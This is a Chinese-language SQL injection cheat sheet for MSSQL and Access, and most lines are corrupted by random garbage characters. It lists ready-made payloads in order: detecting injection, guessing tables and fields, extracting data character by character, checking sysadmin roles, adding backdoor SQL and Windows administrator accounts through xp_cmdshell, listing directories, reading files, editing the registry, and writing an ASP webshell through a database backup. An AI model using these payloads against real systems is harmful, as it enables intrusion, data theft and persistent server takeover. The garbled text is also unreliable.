1.判断是否有注入;and 1=1 ;and 1=2 l"1at eM�3
2.初步判断是否是mssql ;and user>0 HMPb%'U~
vC>8:3Z�aq
3.注入参数是字符'and [查询条件] and ''=' eeu;A�,�@U
�Q,�<���V)
4.搜索时没过滤参数的'and [查询条件] and '%25'=' VVDd39�q��
oe�Iza<:=R
5.判断数据库系统 o=y0=,:a?9
_"688u'�88
;and (select count(*) from sysobjects)>0 mssql �o-�r00H|�
Z@�Q�J5F1y
;and (select count(*) from msysobjects)>0 access ;FO( mL�(�
H&E3RU>�`�
^%�jk�.��*
YK6zN>M}E
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ERz{, >�G?
?5jq)x�d2�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �8��a,�pDE
L�@>$�
A�w
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 JJVdq-k+�`
�P�iZU�_~A
9.(1)猜字段的ascii值(access) +jN%�w{^=�
�I*�hz�lE�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �r�%UsU�j�
\I�Cc�?8oL
(2)猜字段的ascii值(mssql) y;x�Y74Nq�
��8�\B�]�!
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ^M�~Z_CQL2
�mq6�TwM
10.测试权限结构(mssql) Dwg�_#G�Sr
\:�D"�#s%x
vj hh4�$k
<%GfF![�v
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- >dYN@cB$}
#[ ?E�,��
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- y';"tD��Fb
$s"�{C"4�q
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- } z�a�"r�U
�c=��#V*<�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �=�C�g1I\
���L�� w�P
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ['j�r+gIfQ
x_$`#m{hL5
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Zj5B�}[,l\
\^]�*T'>�b
;and 1=(select IS_MEMBER('db_owner'));-- ?�`�T-A\A=
GW\��66$|
�J`�x�Cd/G
�w�~wg�[d�
11.添加mssql和系统的帐户 �"�'v�^X!"
!@4 i:,p@
;exec master.dbo.sp_addlogin username;-- W�|4��h;[w
;exec master.dbo.sp_password null,username,password;-- 28�x:]5=jb
+
[�~)a�4#
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- fe8}2#�<o�
N97�7F$B�o
;exec master.dbo.xp_cmdshell 'net user username password �"�x��V0$%
�8Ai�\T_l
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 7-A/2/G<��
�nR`�)kORc
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Df5!�z�\dx
B&>z�&�!}
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- %:e.��E��S
nN5f�P<H2x
o9]i
{e>L
Ci_Qra� 6�
12.(1)遍历目录 �8T?D#,/�
FL� �E3�LH
;create table dirs(paths varchar(100), id int) ��o8h�`�9_
��7r��o&Q%
;insert dirs exec master.dbo.xp_dirtree 'c:\' ���V[�2}��
4=qZ �Z>[t
;and (select top 1 paths from dirs)>0 /X;/}f�k�
L��d?'X=eQ
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ��Jp"yb`w�
o1Nfn'!3/>
Y1R�?�,�5�
�PnZC
I!Mw
(2)遍历目录 1\ �Gxk&��
\�[&&4CN�{
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ,)M/�mG?,�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 6K�Dm#�7�J
�qT~a`ou:
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 %&j�\:X~A�
sf"vi�i,1A
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ��t-Uo����
[,�56oMd~
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 TyY%<N�CIb
��BlfadM;�
XN�J�3.w:R
Z��ygu/M�6
13.mssql中的存储过程 6uIgyO*;k�
+E-CsNAZ*"
xp_regenumvalues 注册表根键, 子键 $��:RR1.Tv
pGd@%/�]AO
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Zm��*q��V!
�,yg�Uy]��
xp_regread 根键,子键,键值名 ==A�mL�]�*
pp�@O6����
;exec xp_regread '<{Jl�z(u9
yw1-4�*$c�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �3�JEg3|M(
�
JKV&c=�I
xp_regwrite 根键,子键, 值名, 值类型, 值 �2N{�^V?�:
��]=A�DX}�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 RT|�1M"?$�
.$f�SWlM;�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 "
�v<O)1QT
���9�oY�E�
xp_regdeletevalue 根键,子键,值名 �0�D�� L�w
Z�c'^i�DAY
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ,b4o����V
�uS5G(}�[�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �2�5 cJA4�
�(hEg���&@
(67b�y�O{
u+^K�P>rM(
14.mssql的backup创建webshell f,�x;t-o+R
yLPP6_59$�
use model l <p(z�LR
C1>zwU_z�o
create table cmd(str image); �QBh*x�/J�
@C%6Wo4l�3
insert into cmd(str) values (''); ST2:&xH(��
zf>*\pZE��
backup database model to disk='c:\l.asp'; �;;�6��$d{
~ #7@;C<nt
8@�Bm2?$}g
&�(lQgi+^!
15.mssql内置函数 �P�\�WFm
�
<H�tG�p�6q
;and (select @@version)>0 获得Windows的版本号 =R��<�9�2v
�6_:I�~TTX
;and user_name()='dbo' 判断当前系统的连接用户是不是sa Fv*Et-8tN5
�e_"�m\e#N
;and (select user_name())>0 爆当前系统的连接用户 �D5�!#c-Y-
�1_};!�5$.
;and (select db_name())>0 得到当前连接的数据库 1tLEK��So+
�_xmQGX!|�
`NT�tw;%Y
��+#\7
#Y�
16.简洁的webshell ex�
BLj
*]
?GlXxx=eV
use model �W*�%�(J$E
]&N>F8.L+�
create table cmd(str image); T��B-�dV'w
Z�l>dB�c%
insert into cmd(str) values (''); f >.^7.is�
ik�#Wlz`�4
backup database model to disk='g:\wwwtest\l.asp';
